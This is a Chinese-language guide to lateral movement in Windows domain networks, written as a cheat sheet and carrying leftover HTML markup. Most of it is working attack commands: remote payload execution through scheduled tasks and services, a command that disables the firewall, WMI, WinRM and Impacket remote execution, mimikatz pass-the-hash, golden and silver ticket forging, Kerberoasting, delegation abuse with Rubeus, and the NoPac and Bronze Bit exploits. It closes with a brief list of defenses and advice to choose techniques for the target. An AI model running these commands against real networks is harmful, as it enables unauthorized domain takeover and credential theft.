内网渗透横向移动技巧全面指南<\/h1>

文件传输前期准备<\/h2>

网络共享利用<\/h3>

IPC$连接要求<\/strong>：

远程主机开启IPC连接<\/li>
开放139和445端口<\/li> <\/ul> <\/li>
命令示例<\/strong>：
net use \\10.10.10.10\IPC$ "password"<\/span> \/user:"username"<\/span> <\/span><\/span>dir<\/span> \\10.10.10.10\c$ <\/span><\/span><\/code><\/pre><\/li> 安全性<\/strong>：本地执行远程命令，不在远程主机留日志<\/li> <\/ul> SMB服务器搭建<\/h3> SMB协议使用139或445端口<\/li> 创建共享目录供内网主机访问<\/li> CIFS与SMB区别<\/strong>： CIFS是SMB的增强版本<\/li> 获取域控CIFS权限可直接控制域控<\/li> <\/ul> <\/li> <\/ul> 横向移动技术<\/h2> 计划任务<\/h3> Windows < 2012<\/strong>： at \\target 15:47 c:\payload.bat <\/span><\/span><\/code><\/pre><\/li> Windows ≥ 2012<\/strong>： schtasks \/create \/s target \/ru SYSTEM \/tn taskname \/sc DAILY \/tr c:\payload.bat \/F <\/span><\/span>schtasks \/run \/s target \/tn taskname <\/span><\/span><\/code><\/pre><\/li> 日志记录<\/strong>： Microsoft-Windows-TaskScheduler\/Operational<\/li> Microsoft-Windows-TaskScheduler\/Maintenance<\/li> <\/ul> <\/li> <\/ul> 系统服务<\/h3> 创建服务<\/strong>： sc \\target create servicename binpath= "c:\payload.exe"<\/span> <\/span><\/span>sc \\target start servicename <\/span><\/span><\/code><\/pre><\/li> 关闭防火墙<\/strong>： sc \\target create disablefirewall binpath= "netsh advfirewall set allprofiles state off"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> PSEXEC<\/h3> 条件<\/strong>：开启Admin$共享<\/li> 开放139\/445端口<\/li> 有创建服务权限<\/li> <\/ul> <\/li> 工具<\/strong>： PsTools套件<\/li> Impacket的psexec.py<\/li> 日志<\/strong>：事件ID 7045<\/li> <\/ul> <\/li> <\/ul> WMI利用<\/h3> 条件<\/strong>： WMI服务开启<\/li> 开放135端口<\/li> <\/ul> <\/li> 命令示例<\/strong>： wmic \/node:192.168.1.1 \/user:admin \/password:pass process call create "cmd.exe \/c ipconfig > C:\result.txt"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> DCOM利用<\/h3> 通过分布式COM对象远程执行命令<\/li> 需要135和445端口开放<\/li> <\/ul> WinRM利用<\/h3> 配置<\/strong>： winrm quickconfig <\/span><\/span>winrm set winrm\/config\/service\/auth "@{Basic="<\/span>true"}"<\/span> <\/span><\/span>winrm set winrm\/config\/service "@{AllowUnencrypted="<\/span>true"}"<\/span> <\/span><\/span><\/code><\/pre><\/li> 执行命令<\/strong>： winrs -r:http:\/\/target:5985 -u:admin -p:pass "whoami"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> Linux横向渗透工具<\/h2> Impacket工具包<\/h3> wmiexec.py<\/strong>： python wmiexec.py domain\/user:password@target <\/span><\/span><\/code><\/pre><\/li> smbexec.py<\/strong>： python smbexec.py -hashes :hash domain\/user@target <\/span><\/span><\/code><\/pre><\/li> atexec.py<\/strong>： python atexec.py domain\/user:password@target "command"<\/span> <\/span><\/span><\/code><\/pre><\/li> dcomexec.py<\/strong>： python dcomexec.py domain\/user:password@target "whoami"<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 凭证攻击技术<\/h2> 哈希传递(PTH)<\/h3> mimikatz<\/strong>： sekurlsa::pth \/user:user \/domain:domain \/ntlm:hash <\/span><\/span><\/code><\/pre><\/li> 限制<\/strong>： KB2871997补丁后仅administrator账户可用<\/li> 可通过修改注册表绕过限制<\/li> <\/ul> <\/li> <\/ul> 密钥传递(PTK)<\/h3> 使用AES密钥代替NTLM哈希<\/li> 限制<\/strong>：需要Kerberos认证<\/li> 无法在Socks代理环境下使用<\/li> <\/ul> <\/li> <\/ul> Kerberos攻击<\/h2> 黄金票据<\/h3> 条件<\/strong>：域SID<\/li> krbtgt账户hash<\/li> 本地管理员权限<\/li> <\/ul> <\/li> 生成<\/strong>： kerberos::golden \/user:fakeuser \/domain:domain \/sid:SID \/krbtgt:hash \/ticket:gold.kirbi <\/span><\/span><\/code><\/pre><\/li> 使用<\/strong>： kerberos::ptt gold.kirbi <\/span><\/span><\/code><\/pre><\/li> <\/ul> Kerberoasting<\/h3> 攻击服务账户的SPN获取服务票据进行破解<\/li> 工具<\/strong>： Rubeus.exe kerberoast <\/span><\/span>GetUserSPNs.py -request <\/span><\/span><\/code><\/pre><\/li> <\/ul> AS-REP Roasting<\/h3> 攻击未启用预认证的账户<\/li> 工具<\/strong>： Rubeus.exe asreproast <\/span><\/span>GetNPUsers.py <\/span><\/span><\/code><\/pre><\/li> <\/ul> 白银票据<\/h3> 伪造服务票据(ST)<\/li> 生成<\/strong>： kerberos::golden \/domain:domain \/sid:SID \/target:target \/service:service \/rc4:hash \/user:user \/ptt <\/span><\/span><\/code><\/pre><\/li> 服务类型<\/strong>： CIFS - 文件共享<\/li> HOST - 计划任务<\/li> HTTP\/WINRM - 远程管理<\/li> <\/ul> <\/li> <\/ul> 委派攻击<\/h2> 非约束委派<\/h3> 查找<\/strong>： Get-NetComputer -Unconstrained <\/span><\/span><\/code><\/pre><\/li> 利用<\/strong>：诱导域控连接<\/li> 导出TGT<\/li> 注入内存<\/li> <\/ol> <\/li> <\/ul> 约束委派<\/h3> 查找<\/strong>： Get-DomainComputer -TrustedToAuth <\/span><\/span><\/code><\/pre><\/li> 利用<\/strong>： Rubeus.exe s4u \/user:service$ \/rc4:hash \/impersonateuser:admin \/msdsspn:service\/target \/ptt <\/span><\/span><\/code><\/pre><\/li> <\/ul> 基于资源的约束委派<\/h3> 配置<\/strong>： $SD = New-Object Security.AccessControl.RawSecurityDescriptor <\/span><\/span>Set-DomainObject target -Set @{'msds-allowedtoactonbehalfofotheridentity'<\/span>=$SDBytes} <\/span><\/span><\/code><\/pre><\/li> 利用<\/strong>： Rubeus.exe s4u \/user:attacker$ \/rc4:hash \/impersonateuser:admin \/msdsspn:service\/target \/ptt <\/span><\/span><\/code><\/pre><\/li> <\/ul> 特殊漏洞利用<\/h2> CVE-2020-17049 (Kerberos Bronze Bit)<\/h3> 绕过PAC校验<\/li> 利用<\/strong>： python getST.py -force-forwardable ... <\/span><\/span><\/code><\/pre><\/li> <\/ul> CVE-2021-42287 & CVE-2021-42278 (NoPac)<\/h3> 利用步骤<\/strong>：创建机器账户<\/li> 清除SPN<\/li> 修改sAMAccountName冒充域控<\/li> 请求TGT<\/li> 恢复原名称<\/li> S4U请求服务票据<\/li> <\/ol> <\/li> <\/ul> 防御建议<\/h2> 限制委派配置权限<\/li> 启用PAC验证<\/li> 监控异常Kerberos活动<\/li> 定期轮换krbtgt密码<\/li> 限制本地管理员权限<\/li> 启用Windows事件日志审核<\/li> <\/ol> 本指南涵盖了内网横向移动的主要技术和方法，实际使用时需根据目标环境选择合适的技术组合。<\/p>